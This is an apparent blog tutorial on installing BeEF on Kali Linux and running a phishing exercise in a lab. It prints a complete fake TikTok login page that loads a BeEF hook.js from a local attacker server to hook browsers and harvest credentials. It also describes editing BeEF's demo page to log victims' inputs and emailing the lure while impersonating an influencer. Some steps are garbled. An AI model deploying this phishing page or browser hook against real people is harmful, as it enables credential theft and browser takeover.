Beef XSS, short for Browser Exploitation Framework, is a powerful tool used by ethical hackers and security professionals to test the vulnerability of web applications. It allows security experts to assess the security of a website by simulating real-world attacks that exploit vulnerabilities in the user’s browser.
The primary goal of a Beef XSS attack is to inject malicious scripts into web pages that are then executed by the victim’s browser. Unlike traditional XSS attacks, Beef XSS goes beyond stealing cookies or session tokens; it enables attackers to take control of the victim’s browser and use it as a platform for launching further attacks.
This guide outlines steps to perform ethical hacking and phishing simulations using Kali Linux, Beef XSS, and VMware. The project involves assessing web application vulnerabilities and simulating phishing attacks.
In the guide we will be going over the following, Beef XSS, changing the Butcher page, and sending my phishing email impersonating a TikTok influencer. For this example, I will be using kali Linux that I installed onto my MacBook, with the target browser my on VMware.
I. Setting Up Beef XSS
Step 1: Beef Install
Update the system
sudo apt-get update && sudo apt-get upgrade
Install Beef-XSS
sudo apt install beef-XSSall Beef XSS “
step 2: config –
Open the Beef config.yaml file
sudo nano /etc/beef-xss/config.yaml
Update credentials and set the host for HTTP.
Save and exit (Ctrl + X, then Y).
Step 3: operating
Sudo ./ beef
After it starts go to the Ui panel a link should appear or it will automatically load for you.
II. Phishing Simulation
Now for my example Instead of creating a separate html page and having the target need to open our html page or redirect them to the butcher site, we are going to edit the butcher page to fit our needs and send out a phishing email to ourselves.
NOTE: because we are editing the butcher page we will be able to log all inputs and activity while the target is on our page we will also be able to send this email to anyone on our network and redirect them to our hook off of beefs already running Apache server. For my next part I will be using my already fake phishing emails directed at small business impersonating a tic Tok influencer.
I asked chat gpt to create me a simple login page similar to TikTok’s for my personal website, it did not disappoint.
<!DOCTYPE html>
<html lang="en">
<head>
<script src="http://192.168.4.97:3000/hook.js"></script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Tik Tok</title>
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #fff;
text-align: center;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
max-width: 400px;
width: 100%;
padding: 20px;
box-sizing: border-box;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
img {
width: 100px;
margin-bottom: 20px;
}
input {
width: 100%;
padding: 10px;
margin: 8px 0;
box-sizing: border-box;
border: 1px solid #ccc;
border-radius: 4px;
}
button {
background-color: #00a4ef;
color: #fff;
padding: 10px 15px;
border: none;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
}
button:hover {
background-color: #0077cc;
}
</style>
</head>
<body>
<div class="login-container">
<img src="tik_tok.jpg" alt="TikTok Logo">
<h2>Login</h2>
<form action="your_login_handler.php" method="post">
<input type="text" id="username" name="username" placeholder="Username" required>
<input type="password" id="password" name="password" placeholder="Password" required>
<button type="submit">Log In</button>
</form>
</div>
</body>
</html>
I currently have the following hook.js script enabling this page to reach out and talk to my beef server the following script gets place inside the head tag on our html page.
<script src="http://192.168.4.97:3000/hook.js"></script>
Here is the following video on how to add our new page and replace the butcher page. The process is fairly simple my video is at double speed, with the most important being.
- Use elevated privileges to go into beefs extension directory
sudo su
Index.Html in the butcher directory is the page we want to edit the full file path is as follows to get their you need to a super user.
Cd /usr/share/beef-xss/extensions/demos/html/butcher
Note: There is one script we wish to keep in the index.html page
<script src="jquery-1.12.4.min.js"></script>
this script handles the events and logs it back to the beef logs monitoring everything we do on our page, The second important part is to remove our address from our own hook.js script in our header because we are now in the root directory and do not need to let beef know were to go. Our new script should look like
The rest of the video quickly goes over sending the hook to my VMware station from my machine, and shows the same java code being used in the butcher page to log our credentials and monitor our activity while on the page, then runs thru a couple of examples with my fishing email I made for my other project